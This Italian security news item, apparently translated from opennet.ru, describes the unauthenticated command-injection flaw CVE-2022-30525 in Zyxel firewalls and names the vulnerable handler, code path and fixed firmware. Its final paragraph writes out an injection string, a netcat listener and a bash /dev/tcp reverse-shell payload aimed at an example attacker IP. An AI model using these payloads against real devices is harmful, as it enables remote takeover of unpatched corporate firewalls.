Nei dispositivi Zyxel delle serie ATP, VPN e USG FLEX, progettati per organizzare il funzionamento di firewall, IDS e VPN nelle aziende, è stata identificata una vulnerabilità critica (CVE-2022-30525), che consente a un utente malintenzionato esterno di eseguire codice sul dispositivo senza diritti utente senza autenticazione. Per effettuare un attacco, l'aggressore deve essere in grado di inviare richieste al dispositivo utilizzando il protocollo HTTP/HTTPS. Zyxel ha risolto la vulnerabilità nell'aggiornamento del firmware ZLD 5.30. Secondo il servizio Shodan, attualmente sulla rete globale ci sono 16213 dispositivi potenzialmente vulnerabili che accettano richieste tramite HTTP/HTTPS.
Il funzionamento viene effettuato inviando comandi appositamente progettati al gestore web /ztp/cgi-bin/handler, accessibile senza autenticazione. Il problema è causato dalla mancanza di un'adeguata pulizia dei parametri di richiesta durante l'esecuzione dei comandi sul sistema utilizzando la chiamata os.system utilizzata nella libreria lib_wan_settings.py ed eseguita durante l'elaborazione dell'operazione setWanPortSt.
Ad esempio, un utente malintenzionato potrebbe passare la stringa “; ping 192.168.1.210;" che porterà all’esecuzione sul sistema del comando “ping 192.168.1.210”. Per accedere alla shell dei comandi, puoi eseguire "nc -lvnp 1270" sul tuo sistema, quindi avviare una connessione inversa inviando una richiesta al dispositivo con il simbolo '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Fonte: opennet.ru